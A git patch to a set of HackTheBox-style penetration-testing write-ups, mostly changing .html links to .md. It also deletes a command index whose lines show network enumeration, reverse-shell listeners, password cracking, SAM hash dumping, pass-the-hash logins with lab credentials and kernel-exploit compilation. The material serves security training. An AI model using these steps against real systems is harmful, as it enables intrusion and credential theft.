From 673311896a8ea22540840570926fa3b428b8b0c9 Mon Sep 17 00:00:00 2001 From: nihilist Date: Wed, 7 May 2025 08:27:22 +0200 Subject: [PATCH] fix the hacking tutorials --- Easy/27.md | 2 +- Easy/48.md | 2 +- Easy/57.md | 2 +- Medium/26.md | 2 +- Medium/28.md | 4 +- Medium/29.md | 2 +- Medium/31.md | 2 +- Medium/34.md | 2 +- Medium/35.md | 2 +- Medium/4.md | 2 +- Medium/46.md | 4 +- Medium/67.md | 2 +- asm/1.md | 2 +- asm/2.md | 2 +- asm/3.md | 2 +- asm/4.md | 2 +- asm/5.md | 2 +- asm/6.md | 2 +- binexp.md | 68 ++++++------ commands.md | 282 ----------------------------------------------- index.md | 306 +++++++++++++++++++++++++-------------------------- 21 files changed, 207 insertions(+), 489 deletions(-) delete mode 100644 commands.md diff --git a/Easy/27.md b/Easy/27.md index 086b691..0f30eca 100644 --- a/Easy/27.md +++ b/Easy/27.md @@ -313,7 +313,7 @@ Seems like we will use the C exploit n°44298. Let's locate it and copy it onto /usr/share/exploitdb/exploits/linux/local/44298.c -Fun Fact : we're going to privesc the exact same way as we did back on the [Bashed](15.html) machine. +Fun Fact : we're going to privesc the exact same way as we did back on the [Bashed](15.md) machine. λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ] diff --git a/Easy/48.md b/Easy/48.md index 6168d16..b8a1558 100644 --- a/Easy/48.md +++ b/Easy/48.md @@ -247,7 +247,7 @@ Here we get the /manager/text URI and if we lookup the tomcat documentation, thi -So from here, just like for the [Kotarak](../Hard/7.html) box, we can upload a malicious WAR file to get us a shell, we're going to generate it using msfvenom: +So from here, just like for the [Kotarak](../Hard/7.md) box, we can upload a malicious WAR file to get us a shell, we're going to generate it using msfvenom: [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] diff --git a/Easy/57.md b/Easy/57.md index a4bad49..3ea1eb1 100644 --- a/Easy/57.md +++ b/Easy/57.md 
@@ -189,7 +189,7 @@ Just like we saw earlier, we see that the DC name is **EGOTISTICAL-BANK.LOCAL** -Now let's use GetNPusers.py to get the TGT (Ticket Granting Ticket) if the account doesn't need Kerberos pre-authentication, just like we did back on the [Forest](38.html) box. +Now let's use GetNPusers.py to get the TGT (Ticket Granting Ticket) if the account doesn't need Kerberos pre-authentication, just like we did back on the [Forest](38.md) box. [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna] diff --git a/Medium/26.md b/Medium/26.md index c154704..f9c5d2f 100644 --- a/Medium/26.md +++ b/Medium/26.md @@ -587,7 +587,7 @@ We try to ssh as the user prometheus with his assumed password St34l_th3_F1re : icarus@620b296204a3:~$ -We can't ssh on port 2222 as the user prometheus, because he isn't even an user on the box, so assuming from the hades riddle, we can assume that it is about port knocking just like on the box [Nineveh](10.html): +We can't ssh on port 2222 as the user prometheus, because he isn't even an user on the box, so assuming from the hades riddle, we can assume that it is about port knocking just like on the box [Nineveh](10.md): λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus] diff --git a/Medium/28.md b/Medium/28.md index e667503..dfc3a9f 100644 --- a/Medium/28.md +++ b/Medium/28.md @@ -55,7 +55,7 @@ Our nmap scan picked up port 5000 running http Gunicorn 19 so let's investigate ` ![](prg/28_001.png) -Looks like we have a website in construction so let's check out /upload which is a webpage onto which we can upload xml files So just like for [Aragorg](19.html), we will try to do some XXE exploitation, by first trying to print out the /etc/passwd file: +Looks like we have a website in construction so let's check out /upload which is a webpage onto which we can upload xml files So just like for [Aragorg](19.md), we will try to do some XXE exploitation, by first trying to print out the /etc/passwd file: ![](prg/28_002.png) 
@@ -135,7 +135,7 @@ From there we navigate around and we stumble upon an interesting directory /home 4.0K drwxrwx--- 2 roosa roosa 4.0K Mar 26 2018 src -Now let's get into the .git directory and see if we can print out the previous git commits just like on the [Canape box](25.html) but this time we specify the -p flag in order to list the changes under each commit: +Now let's get into the .git directory and see if we can print out the previous git commits just like on the [Canape box](25.md) but this time we specify the -p flag in order to list the changes under each commit: roosa@gitter:~/work/blogfeed$ git log -p diff --git a/Medium/29.md b/Medium/29.md index 765472b..6ddec94 100644 --- a/Medium/29.md +++ b/Medium/29.md @@ -69,7 +69,7 @@ As always we begin our Enumeration using **Nmap** to enumerate opened ports. We ## **Part 2 : Getting User Access** -Our nmap scan picked up port 80 running http with drupal 7 just like the box [Bastard](2.html) except that this time we are dealing with a linux box. Although our nmap scan also picked up port 21 ftp with anonymous login, so let's check it out first: +Our nmap scan picked up port 80 running http with drupal 7 just like the box [Bastard](2.md) except that this time we are dealing with a linux box. Although our nmap scan also picked up port 21 ftp with anonymous login, so let's check it out first: λ nihilist [ 10.10.14.24/23 ] [~] diff --git a/Medium/31.md b/Medium/31.md index 99cc35a..1a32e60 100644 --- a/Medium/31.md +++ b/Medium/31.md @@ -149,7 +149,7 @@ From there all that we have to do is upload our reverse php shell and use it to → nano nihilist.php -Now the trick here is, we are not on a Linux box like on [Apocalyst](11.html), we need to tweak our reverse php shell like so : +Now the trick here is, we are not on a Linux box like on [Apocalyst](11.md), we need to tweak our reverse php shell like so : <****?php diff --git a/Medium/34.md b/Medium/34.md index 7231ac2..fbde3e8 100644 --- a/Medium/34.md 
+++ b/Medium/34.md @@ -170,7 +170,7 @@ The interesting directory here is "/debug" which reveals us that the server is u ![](prg/34_001.png) -Here we see that support for IPv6 is enabled so with the combination of snmp running on port 161/udp we are heavily reminded of the previous box [Sneaky](7.html). +Here we see that support for IPv6 is enabled so with the combination of snmp running on port 161/udp we are heavily reminded of the previous box [Sneaky](7.md). ![](prg/34_002.png) diff --git a/Medium/35.md b/Medium/35.md index bf77e07..4d7aa00 100644 --- a/Medium/35.md +++ b/Medium/35.md @@ -268,7 +268,7 @@ Both the IPs are still up. the IP .5 is supposed to be the Firewall, and .4 is s Connection to 192.168.122.4 80 port [tcp/http] succeeded! -So it looks like only 192.168.122.4 responded with 2 opened ports, we seem to have access to port 22 and 80. Now the problem here is, we do not have access to curl on the machine, so my initial thought was to make a ssh tunnel just like we did on [Hawk](29.html). But this case is different since this is not a specific port on the machine (127.0.0.1:port),in this case we need to be able to access an OTHER host through said tunnel: +So it looks like only 192.168.122.4 responded with 2 opened ports, we seem to have access to port 22 and 80. Now the problem here is, we do not have access to curl on the machine, so my initial thought was to make a ssh tunnel just like we did on [Hawk](29.md). But this case is different since this is not a specific port on the machine (127.0.0.1:port),in this case we need to be able to access an OTHER host through said tunnel: _Hawk SSH Tunnel:_ diff --git a/Medium/4.md b/Medium/4.md index 855b566..06caea5 100644 --- a/Medium/4.md +++ b/Medium/4.md 
@@ -148,7 +148,7 @@ We can, therefore we execute LinEnum.sh after adding the executing right with ch 4.0K -rwxr-xr-x 1 www-data www-data 1.7K Apr 9 2017 artisan -To privesc on the machine, we'll modify the artisan file (which is a php file) to contain a reverse shell, we'll use the same reverse shell named nihilist.php that we used when we did [Popcorn](1.html) +To privesc on the machine, we'll modify the artisan file (which is a php file) to contain a reverse shell, we'll use the same reverse shell named nihilist.php that we used when we did [Popcorn](1.md) λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Cronos] diff --git a/Medium/46.md b/Medium/46.md index 837ecaa..6de2b3d 100644 --- a/Medium/46.md +++ b/Medium/46.md @@ -159,7 +159,7 @@ However as you can see here sadly it is also an authenticated exploit requiring ![](prg/46_007.png) -Before sending this over to the repeater, we see that the request has a Cross Site Request Forgery token (CSRF token) This is used to prevent cross site forgery attacks not necessarily bruteforcing, To continue here we need to take another look at centreon's [REST API documentation](https://docs.centreon.com/docs/centreon/fr/19.04/api/api_rest/) for the current version 19.04 just like for the [Craft](44.html) box: +Before sending this over to the repeater, we see that the request has a Cross Site Request Forgery token (CSRF token) This is used to prevent cross site forgery attacks not necessarily bruteforcing, To continue here we need to take another look at centreon's [REST API documentation](https://docs.centreon.com/docs/centreon/fr/19.04/api/api_rest/) for the current version 19.04 just like for the [Craft](44.md) box: ![](prg/46_008.png) 
@@ -894,7 +894,7 @@ So here we are hinted towards the /bin/screen-4.5.0 binary which seems to contai -So here we see the public exploits available to us, which should ring a bell because we also did a privesc through the screen binary back in the [Haircut](8.html) box which had literally the same binary as this box, so it will be quite similar: +So here we see the public exploits available to us, which should ring a bell because we also did a privesc through the screen binary back in the [Haircut](8.md) box which had literally the same binary as this box, so it will be quite similar: _Terminal 1:_ diff --git a/Medium/67.md b/Medium/67.md index e1f05f5..9a05c5b 100644 --- a/Medium/67.md +++ b/Medium/67.md 
@@ -45,7 +45,7 @@ Our nmap scan picked up Apache Tomcat running on port 8080 so let's investigate ![](prg/67_001.png) -So the webserver is apparently a YAML parser, similarly to the [Time](64.html) box, this is probably about deserialization, however unlike for the Time box, giving it random data does not necessarily reveal the backend that's being used. Rather we can simply base our assumption that it is running a java backend because we saw that we were on apache tomcat. So let's look for YAML java deserialization payload by googling a bit, and we stumble upon [this](https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858) article, so let's first verify that this webserver is vulnerable with the following payload: +So the webserver is apparently a YAML parser, similarly to the [Time](64.md) box, this is probably about deserialization, however unlike for the Time box, giving it random data does not necessarily reveal the backend that's being used. Rather we can simply base our assumption that it is running a java backend because we saw that we were on apache tomcat. So let's look for YAML java deserialization payload by googling a bit, and we stumble upon [this](https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858) article, so let's first verify that this webserver is vulnerable with the following payload: !!javax.script.ScriptEngineManager [ diff --git a/asm/1.md b/asm/1.md index e484054..b4f2273 100644 --- a/asm/1.md +++ b/asm/1.md @@ -82,5 +82,5 @@ and now we have our executable file called '0', we make it executable with chmod -And that concludes our first assembly code! in the next part we're going to explain everything about this code [here](2.html). +And that concludes our first assembly code! in the next part we're going to explain everything about this code [here](2.md). diff --git a/asm/2.md b/asm/2.md index c3d660d..34abbf9 100644 --- a/asm/2.md +++ b/asm/2.md 
@@ -132,5 +132,5 @@ and thus we get resulting final code: Most x86_64 assembly code have 3 sections, the .data section , the .bss section and the .text section. the label we used here _start acts like a function, everytime we will use the word _start in our code, it is going to execute the portion of code that's associated with it. -In the next subject we're going to dig into jumps, calls and comparaisons, you can click [here](3.html). +In the next subject we're going to dig into jumps, calls and comparaisons, you can click [here](3.md). diff --git a/asm/3.md b/asm/3.md index 62942ec..c202093 100644 --- a/asm/3.md +++ b/asm/3.md @@ -100,5 +100,5 @@ Here we're going to use nasm and ld to compile our assembly code, and then we ju → ./3 Hello, World! -In the next tutorial we will see how to get user input, you can click [here](4.html). +In the next tutorial we will see how to get user input, you can click [here](4.md). diff --git a/asm/4.md b/asm/4.md index cdbb64b..fd2a9cf 100644 --- a/asm/4.md +++ b/asm/4.md @@ -118,5 +118,5 @@ Here we're going to use nasm to compile our assembly code and then use ld to cre -And that's it ! in the next tutorial we will cover math operations and the stack, you can click [here](5.html). +And that's it ! in the next tutorial we will cover math operations and the stack, you can click [here](5.md). diff --git a/asm/5.md b/asm/5.md index 6a3df79..4e56024 100644 --- a/asm/5.md +++ b/asm/5.md @@ -84,5 +84,5 @@ Here we're going to use nasm to compile our assembly code: -And that's it ! next tutorial we'll look into loops, you can click [here](6.html). +And that's it ! next tutorial we'll look into loops, you can click [here](6.md). diff --git a/asm/6.md b/asm/6.md index 2470932..e434e8f 100644 --- a/asm/6.md +++ b/asm/6.md 
@@ -103,5 +103,5 @@ Here we're going to use nasm to compile our assembly code and then use ld to get -And we see that we have been able to print out the Hello World text string inside of test.txt ! In the next tutorial we will check out a minimal shellcode used to spawn a /bin/sh shell. you can click [here](7.html). +And we see that we have been able to print out the Hello World text string inside of test.txt ! In the next tutorial we will check out a minimal shellcode used to spawn a /bin/sh shell. you can click [here](7.md). diff --git a/binexp.md b/binexp.md index df6cd49..2cdcff2 100644 --- a/binexp.md +++ b/binexp.md @@ -4,15 +4,15 @@ ##### Below you fill find my binary exploitation learning notes, the easier challenges are at the top, and the further down you go, the more we dig into advanced concepts. -[ Template Page ](0/0.html) +[ Template Page ](0/0.md) ![](../assets/img/user.png) nihilist ##### Preparing the Tools - 1. [Installing gdb gef](0/gdb.html) - 2. [Installing py pwntools](0/pwntools.html) - 3. [Installing GHIDRA](0/ghidra.html) + 1. [Installing gdb gef](0/gdb.md) + 2. [Installing py pwntools](0/pwntools.md) + 3. [Installing GHIDRA](0/ghidra.md) @@ -28,9 +28,9 @@ The basics of reversing with simple to understand examples - 1. [✅ Strings](1/strings.html) - 2. [✅ Helithumper RE](1/heli.html) - 3. [✅ CSAW 2019 Beleaf](1/beleaf.html) + 1. [✅ Strings](1/strings.md) + 2. [✅ Helithumper RE](1/heli.md) + 3. [✅ CSAW 2019 Beleaf](1/beleaf.md) * | grep strings chmod 
@@ -45,12 +45,12 @@ The basics of reversing with simple to understand examples These are the most common binary exploits, they are there because of insecure functions that do not set a limit to user input, allowing the user to overwrite other memory registers. - 1. [✅ CSAW 2018 Quals boi](2/boi.html) - 2. [✅ TAMU 2019 pwn1](2/pwn1.html) - 3. [✅ TW 2017 Just Do It!](2/just.html) - 4. [✅ CSAW 2016 Warmup](2/warm.html) - 5. [✅ CSAW 2018 Get it](2/get.html) - 6. [✅ TUCTF 2017 Vulnchat](2/vuln.html) + 1. [✅ CSAW 2018 Quals boi](2/boi.md) + 2. [✅ TAMU 2019 pwn1](2/pwn1.md) + 3. [✅ TW 2017 Just Do It!](2/just.md) + 4. [✅ CSAW 2016 Warmup](2/warm.md) + 5. [✅ CSAW 2018 Get it](2/get.md) + 6. [✅ TUCTF 2017 Vulnchat](2/vuln.md) @@ -69,13 +69,13 @@ These are the most common binary exploits, they are there because of insecure fu As i hit the shellcode buffer overflow binary challenges, i realized that i needed assembly skills, so this is a simple introduction to modern intel Assembly for the x86_64 (64bits) architecture. We make use of the [syscalls](https://chromium.googlesource.com/chromiumos/docs/+/HEAD/constants/syscalls.md#x86_64-64_bit) used to communicate with the Linux Kernel: - 1. [✅ Hello World](asm/1.html) - 2. [✅ Hello World Explained ](asm/2.html) - 3. [✅ Jumps, Calls](asm/3.html) - 4. [✅ User Input](asm/4.html) - 5. [✅ Math Operations](asm/5.html) - 6. [✅ Reading / Writing Files](asm/6.html) - 7. [✅ Spawning a shell](asm/7.html) + 1. [✅ Hello World](asm/1.md) + 2. [✅ Hello World Explained ](asm/2.md) + 3. [✅ Jumps, Calls](asm/3.md) + 4. [✅ User Input](asm/4.md) + 5. [✅ Math Operations](asm/5.md) + 6. [✅ Reading / Writing Files](asm/6.md) + 7. [✅ Spawning a shell](asm/7.md) 
@@ -83,17 +83,17 @@ As i hit the shellcode buffer overflow binary challenges, i realized that i need ##### 2) Stack Buffer Overflows (Part 2) - 1. [✅ CSAW 2017 Pilot](2/pilot.html) - 2. [✅ Tamu 2019 pwn3](2/pwn3.html) - 3. [✅ Tuctf 2018 shella-easy](2/shella.html) - 4. [✅ BKP 2016 calc](2/calc.html) - 5. [✅ DCQuals 2019 speed](2/speed.html) - 6. [✅ DCQuals 2016 feed](2/feed.html) - 7. [✅ CSAW 2019 babyboi](2/bboi.html) - 8. [✅ CSAW 2017 SVC](2/svc.html) - 9. [✅ FB 2019 Overfloat](2/overf.html) - 10. [✅ hs 2019 storytime](2/hs.html) - 11. [✅ UTC 2019 shellme](2/shme.html) + 1. [✅ CSAW 2017 Pilot](2/pilot.md) + 2. [✅ Tamu 2019 pwn3](2/pwn3.md) + 3. [✅ Tuctf 2018 shella-easy](2/shella.md) + 4. [✅ BKP 2016 calc](2/calc.md) + 5. [✅ DCQuals 2019 speed](2/speed.md) + 6. [✅ DCQuals 2016 feed](2/feed.md) + 7. [✅ CSAW 2019 babyboi](2/bboi.md) + 8. [✅ CSAW 2017 SVC](2/svc.md) + 9. [✅ FB 2019 Overfloat](2/overf.md) + 10. [✅ hs 2019 storytime](2/hs.md) + 11. [✅ UTC 2019 shellme](2/shme.md) @@ -115,9 +115,9 @@ As i hit the shellcode buffer overflow binary challenges, i realized that i need ##### 3) Bad Seed - 1. [✅ h3 time ](3/h3.html) - 2. [✅ hsctf 2019 tux talk ](3/tux.html) - 3. [✅ Sunshine 17 Prepared ](3/prep.html) + 1. [✅ h3 time ](3/h3.md) + 2. [✅ hsctf 2019 tux talk ](3/tux.md) + 3. [✅ Sunshine 17 Prepared ](3/prep.md) diff --git a/commands.md b/commands.md deleted file mode 100644 index 7f3490a..0000000 --- a/commands.md +++ /dev/null 
@@ -1,282 +0,0 @@ -# ip=10.10.14.48 port=9005 course=2 - Easy/26.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Teacher] → nc -lvnp 9005 - Easy/26.html: → hash-identifier - Easy/11.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.40 - Easy/28.html: → nmap -F 10.10.10.123 - Easy/28.html: → nmap -sC -sV 10.10.10.123 -p 21,22,53,80,139,443,445 - Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbmap -H 10.10.10.123 -p 445,139 - Easy/28.html:→ enum4linux 10.10.10.123 - Easy/28.html:→ smbclient \\\\10.10.10.123\\general - Easy/28.html:→ mv creds.txt Friendzone/creds.txt - Easy/28.html:→ mkdir Friendzone - Easy/28.html:→ mv creds.txt Friendzone/creds.txt - Easy/28.html:→ cd Friendzone - Easy/28.html:→ cat creds.txt - Easy/28.html: → nmap 10.10.10.123 --script smb-enum-shares - Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → pacman -S blackarch/python2-dnsknife - Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → dig axfr @10.10.10.123 friendzone.red - Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbclient -H //10.10.10.123/Development - Easy/28.html:λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001 - Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001 - Easy/36.html: → nmap -F 10.10.10.149 - Easy/36.html: → nmap -sCV -p80,135,445 10.10.10.149 - Easy/36.html: → git clone https://github.com/theevilbit/ciscot7 - Easy/36.html: → cd ciscot7 - Easy/36.html: → ls [21af318] - Easy/36.html: → python ciscot7.py -p 0242114B0E143F015F5D1E161713 [21af318] - Easy/36.html: → python ciscot7.py -p 02375012182C1A1D751618034F36415408 [21af318] - Easy/36.html: → echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' >> cis.md5 [21af318] - Easy/36.html: → cat cis.md5 [21af318] - Easy/36.html: → hashcat -m 500 [21af318] - Easy/36.html: → hashcat -m 500 cis.md5 /usr/share/wordlists/rockyou.txt [21af318] - Easy/36.html:→ nano users.txt - Easy/36.html:→ nano pass.txt - Easy/36.html:→ 
crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt - Easy/36.html: → msfdb init - Easy/36.html: → msfconsole - Easy/36.html:→ locate psexec.py - Easy/36.html:→ cd /usr/share/doc/python3-impacket/examples/ - Easy/36.html:→ ls - Easy/36.html:→ python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149 - Easy/36.html: → python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149 - Easy/36.html: → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt - Easy/36.html: → git clone https://github.com/Hackplayers/evil-winrm - Easy/36.html: → cd evil-winrm - Easy/36.html: → cat Gemfile [e501272] - Easy/36.html: → gem install winrm winrm-fs stringio [e501272] - Easy/36.html: → sudo !! [e501272] - Easy/36.html: → sudo gem install winrm winrm-fs stringio [e501272] - Easy/36.html: → ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i 10.10.10.149 [e501272] - Easy/36.html: → wget https://download.sysinternals.com/files/SysinternalsSuite.zip - Easy/36.html: → mv ~/Downloads/SysinternalsSuite.zip . - Easy/36.html: → unzip SysinternalsSuite.zip - Easy/36.html: → strings firefox.exe_200218_153036.dmp | grep pass [e501272] - Easy/36.html: → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt --shares - Easy/36.html:→ python3 psexec.py administrator@10.10.10.149 - Easy/31.html: → nmap -F 10.10.10.134 - Easy/31.html: → nmap -sCV -p22,135,139,445 10.10.10.134 - Easy/31.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/] → smbclient -L //10.10.10.134/ -U "" - Easy/31.html: → smbclient //10.10.10.134/Backups - Easy/31.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bastion] → cat note.txt - Easy/31.html:→ mount -t cifs //10.10.10.134/Backups mount - Easy/31.html:→ ls && cd mount - Easy/31.html:→ ls - Easy/31.html: → smbmap -u nihilist -H 10.10.10.134 - Easy/31.html: → ls - Easy/31.html: → ls - Easy/31.html: → du -hs WindowsImageBackup - Easy/31.html: → cd WindowsImageBackup - Easy/31.html: → cd L4mpje-PC - Easy/31.html: → ls - Easy/31.html: → cd Backup\ 2019-02-22\ 124351 - Easy/31.html: → 
du -hs * - Easy/31.html: → guestmount - Easy/31.html: → apt install libguestfs-tools && guestmount --help - Easy/31.html: → mkdir /home/nihilist/_HTB/Bastion/vhd - Easy/31.html: → guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /home/nihilist/_HTB/Bastion/vhd - Easy/31.html: → cd /home/nihilist/_HTB/Bastion - Easy/31.html: → cd vhd - Easy/31.html: → ls - Easy/31.html:→ find Desktop Documents Downloads -ls - Easy/31.html: → cd ../.. - Easy/31.html: → cd Windows/System32/config - Easy/31.html: → ls - Easy/31.html: → cp SAM SYSTEM /home/nihilist/_HTB/Bastion - Easy/31.html: → cd ../../../.. - Easy/31.html: → ls - Easy/31.html: → file SAM SYSTEM - Easy/31.html: → mkdir backup && mv SAM backup/ && mv SYSTEM backup/ - Easy/31.html: → cd backup - Easy/31.html: → ls - Easy/31.html: → impacket-secretsdump -sam SAM -system SYSTEM local - Easy/31.html:→ smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134 - Easy/31.html:→ ssh L4mpje@10.10.10.134 - Easy/31.html: → cd vhd - Easy/31.html: → ls - Easy/31.html: → cd Windows/System32/config - Easy/31.html: → ls -lash | grep SAM - Easy/31.html: → ls -lash | grep SYSTEM - Easy/31.html: → cd ../../.. - Easy/31.html: → cd .. 
- Easy/31.html: → curl -sk https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1 > jaws-enum.ps1 - Easy/31.html: → ifconfig | grep inet - Easy/31.html: → python -m SimpleHTTPServer 8080 - Easy/31.html:→ curl -sk https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py > mremoteng.py - Easy/31.html:→ python3 mremoteng.py - Easy/31.html: → python3 mremoteng.py -s yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB - Easy/31.html: → python3 mremoteng.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== - Easy/31.html:→ ssh Administrator@10.10.10.134 - Easy/31.html: → ssh Administrator@10.10.10.134 - Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.68 - Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.68/ - Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nano rev.php - Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → cat rev.php - Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80 - Easy/15.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001 - Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → curl -vsk http://10.10.10.68/uploads/rev.php - Easy/15.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001 - Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → searchsploit kernel 4.4 - Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → locate 44298.c - Easy/15.html:λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → cp /usr/share/exploitdb/exploits/linux/local/44298.c . 
- Easy/15.html:λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → gcc -o 44298 -m64 44298.c - Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → ls - Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80 - Easy/22.html: → nmap 10.10.10.98 -F - Easy/22.html:→ nmap -sCV 10.10.10.98 - Easy/22.html:→ ftp 10.10.10.98 - Easy/22.html:→ 7z x Access\ Control.zip - Easy/22.html:→ ls - Easy/22.html:→ file backup.mdb - Easy/22.html: → 7z x Access\ Control.zip -paccess4u@security - Easy/22.html: → ls - Easy/22.html: → file Access\ Control.pst - Easy/22.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Access] → telnet 10.10.10.98 - Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.75 - Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.75/ - Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.75/nibbleblog/ - Easy/16.html:λ nihilist [ 10.10.14.48/23 ] [~] → searchsploit Nibbleblog 4.0.3 - Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → msfconsole - Easy/33.html: → nmap -F 10.10.10.138 - Easy/33.html:→ nmap -sCV -p80 10.10.10.138 - Easy/33.html: → echo '10.10.10.138 writeup.htb' >> /etc/hosts - Easy/33.html: → curl -sk http://writeup.htb/ - Easy/33.html: → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50 - Easy/33.html: → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50 - Easy/33.html: → nikto -h http://10.10.10.138/ - Easy/33.html: → curl -sk http://10.10.10.138/robots.txt - Easy/33.html: → curl -sk http://10.10.10.138/writeup/ | grep CMS - Easy/33.html:→ searchsploit CMS Made Simple | grep Injection - Easy/33.html:→ locate 46635.py - Easy/33.html:→ cp /usr/share/exploitdb/exploits/php/webapps/46635.py . 
- Easy/33.html:→ nano 46635.py - Easy/33.html:→ python 46635.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt - Easy/33.html: → ssh jkr@writeup.htb - Easy/33.html:→ cat nihilist.py - Easy/33.html:→ python -m SimpleHTTPServer 8080 - Easy/33.html:→ nc -lvnp 1234 - Easy/33.html: → ssh jkr@10.10.10.138 - Easy/33.html:→ nc -lvnp 1234 - Easy/35.html: → nmap -F 10.10.10.147 --top-ports 10000 -vvv - Easy/35.html: → nmap -sCV -p22,80,1337 10.10.10.147 - Easy/35.html: → nikto -h http://10.10.10.147/ - Easy/35.html: → dirsearch -u http://10.10.10.147/ -e php,html,txt,js - Easy/35.html: → ls - Easy/35.html: → file myapp - Easy/35.html: → chmod +x myapp - Easy/35.html: → gdb ./myapp - Easy/35.html:→ wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh - Easy/35.html:→ gdb -q myapp - Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) - Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000 - Easy/35.html:$rsp : 0x00007fffffffe438 → "AAAAAAAA" - Easy/35.html:$rsi : 0x00000000004052a0 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]" - Easy/35.html:$rip : 0x00000000004011ac → <****main+77> ret - Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001 - Easy/35.html:0x00007fffffffe448│+0x0010: 0x00007fffffffe518 → 0x00007fffffffe774 → "/home/nihilist/_HTB/Safe/Ghidra/myapp" - Easy/35.html:0x00007fffffffe458│+0x0020: 0x000000000040115f → <****main+0> push rbp - Easy/35.html:0x00007fffffffe470│+0x0038: 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html: → 0x4011ac <****main+77> ret - Easy/35.html:[#0] 0x4011ac → main() - Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) 
